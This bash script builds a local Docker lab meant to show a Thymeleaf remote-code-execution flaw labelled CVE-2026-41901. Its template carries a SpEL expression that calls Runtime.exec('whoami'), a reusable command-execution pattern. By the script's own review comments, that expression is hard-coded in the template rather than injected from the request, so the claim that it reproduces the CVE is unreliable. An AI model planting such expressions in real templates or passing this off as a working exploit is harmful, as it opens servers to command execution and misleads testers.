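#!/bin/bash
# CVE-2026-41901 Docker POC with Visible RCE Output
#
# Generates a throwaway Spring Boot + Thymeleaf project under ./$PROJECT_NAME
# (pom.xml, one controller, one template, a Dockerfile), builds it into a
# Docker image and starts it as a container.
# Requires: bash and docker. Maven runs inside the build image, not on the host.

# -e: stop at the first failing command; -u: an unset variable is an error;
# pipefail: a pipeline fails when any stage fails.
set -euo pipefail

readonly PROJECT_NAME="thymeleaf-cve-2026-41901-rce"

# Quoted expansions and `--` keep the path a single, non-option argument even
# if the project name is later changed to contain spaces or a leading dash.
mkdir -p -- "$PROJECT_NAME/src/main/java/com/example"
mkdir -p -- "$PROJECT_NAME/src/main/resources/templates"

# Every later relative path (pom.xml, src/..., Dockerfile, the `docker build .`
# context) depends on this cd, so a failure here must stop the script rather
# than let files be written into the caller's directory.
cd -- "$PROJECT_NAME" || {
  printf 'cannot enter %s\n' "$PROJECT_NAME" >&2
  exit 1
}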
# pom.xml (same vulnerable version)
# Writes the Maven build file. The project inherits from
# spring-boot-starter-parent 3.2.0 and declares the web and Thymeleaf starters
# without versions, so those come from the parent's dependency management.
# org.thymeleaf:thymeleaf is additionally declared with an explicit version
# (3.1.4.RELEASE), which takes precedence over the parent-managed one; this is
# the release the author labels as vulnerable.
# NOTE(review): only the core artifact is pinned here. Any Thymeleaf/Spring
# integration module pulled in by the starter keeps its parent-managed version;
# confirm that combination is the one the advisory describes.
# The quoted delimiter ('EOF') stops the shell from expanding anything inside
# the XML.
cat > pom.xml << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
<modelVersion>4.0.0</modelVersion>
<groupId>com.example</groupId>
<artifactId>thymeleaf-cve-poc</artifactId>
<version>1.0</version>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>3.2.0</version>
</parent>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.thymeleaf</groupId>
<artifactId>thymeleaf</artifactId>
<version>3.1.4.RELEASE</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
EOF
# Main Application
# Writes the only Java source file: a Spring Boot entry point that is also the
# MVC controller. GET /poc copies the `input` query parameter into the model as
# `userInput` and returns the view name "poc" (templates/poc.html).
# `input` is declared with a bare @RequestParam (no default, not optional), so
# a request without it is rejected by Spring before the template is rendered.
# The controller does no validation of `input`; what happens to the value is
# decided entirely by the template.
# The quoted delimiter ('EOF') stops the shell from expanding anything inside
# the Java source.
cat > src/main/java/com/example/ThymeleafPocApplication.java << 'EOF'
package com.example;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
@SpringBootApplication
@Controller
public class ThymeleafPocApplication {
public static void main(String[] args) {
SpringApplication.run(ThymeleafPocApplication.class, args);
}
@GetMapping("/poc")
public String poc(@RequestParam String input, Model model) {
model.addAttribute("userInput", input);
return "poc";
}
}
EOF
# Improved Template - Better for output reflection
# Writes templates/poc.html. The quoted delimiter ('EOF') keeps the shell from
# expanding the ${...} expressions, so they reach Thymeleaf verbatim.
# Two expressions are evaluated when the page is rendered:
#   - <div th:text="${userInput}"> prints the request's `input` value; th:text
#     HTML-escapes its result, so the value is displayed as plain text.
#   - <pre th:text="..."> is a fixed expression written into the template
#     itself and does not read `userInput`. Whatever appears under
#     "Command Output" therefore comes from template-author-controlled markup,
#     not from request data.
# NOTE(review): whether the pinned Thymeleaf/Spring versions evaluate or reject
# the <pre> expression is not shown on this page - confirm against the
# advisory for CVE-2026-41901 before treating this as a reproduction.
cat > src/main/resources/templates/poc.html << 'EOF'
<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head><title>CVE-2026-41901 RCE POC</title></head>
<body>
<h1>Thymeleaf CVE-2026-41901 - Remote Command Execution</h1>
<div th:text="${userInput}"></div>
<hr>
<h3>Command Output:</h3>
<pre th:text="${@java.util.Scanner@new(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream()).useDelimiter('\\A').next()}"></pre>
</body>
</html>
EOF
# Dockerfile
# Writes a two-stage Dockerfile: the Maven/JDK 21 stage copies the whole
# project directory in and packages it with tests skipped; only the resulting
# jar (target/thymeleaf-cve-poc-1.0.jar, matching the pom's artifactId and
# version) is copied into the JRE 21 runtime stage, which starts it with
# `java -jar` and declares port 8080.
# NOTE(review): both base images are referenced by tag, not by digest, so the
# image contents can differ between builds.
# NOTE(review): the runtime stage sets no USER, so the application runs as the
# base image's default user (presumably root - confirm).
cat > Dockerfile << 'EOF'
FROM maven:3.9.6-eclipse-temurin-21 AS build
WORKDIR /app
COPY . .
RUN mvn clean package -DskipTests
FROM eclipse-temurin:21-jre
WORKDIR /app
COPY --from=build /app/target/thymeleaf-cve-poc-1.0.jar app.jar
EXPOSE 8080
ENTRYPOINT ["java", "-jar", "app.jar"]
EOF
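# Build the image from the generated project and start it as a detached
# container, then print the URL to open.
# The image tag and container name are held in variables so the build, run and
# clean-up commands cannot drift apart.
IMAGE_TAG="thymeleaf-cve-2026-41901-rce:latest"
CONTAINER_NAME="thymeleaf-rce"

echo "[+] Building Docker image..."
docker build -t "$IMAGE_TAG" .

# A container left over from an earlier run would make `docker run --name`
# fail on the name conflict. Removal is deliberately best-effort: "no such
# container" on a first run is expected and ignored.
docker rm -f "$CONTAINER_NAME" >/dev/null 2>&1 || true

echo "[+] Starting container..."
# The application is intentionally unsafe, so it is reachable from this host
# only: the published port is bound to 127.0.0.1 instead of all interfaces
# (a bare `-p 8080:8080` would expose it to the local network). Capabilities
# are dropped and privilege escalation is disabled; the app only needs to
# listen on an unprivileged port.
docker run -d --name "$CONTAINER_NAME" \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  -p 127.0.0.1:8080:8080 \
  "$IMAGE_TAG"
echo ""
echo "=================================================="
echo "✅ Docker RCE POC is ready!"
echo "Test URL: http://localhost:8080/poc?input=TEST"
# The container is started detached, so the JVM may still be booting when this
# banner is printed; point at the logs and at the tear-down command.
echo "Startup log:  docker logs -f $CONTAINER_NAME"
echo "Tear down:    docker rm -f $CONTAINER_NAME"
echo "=================================================="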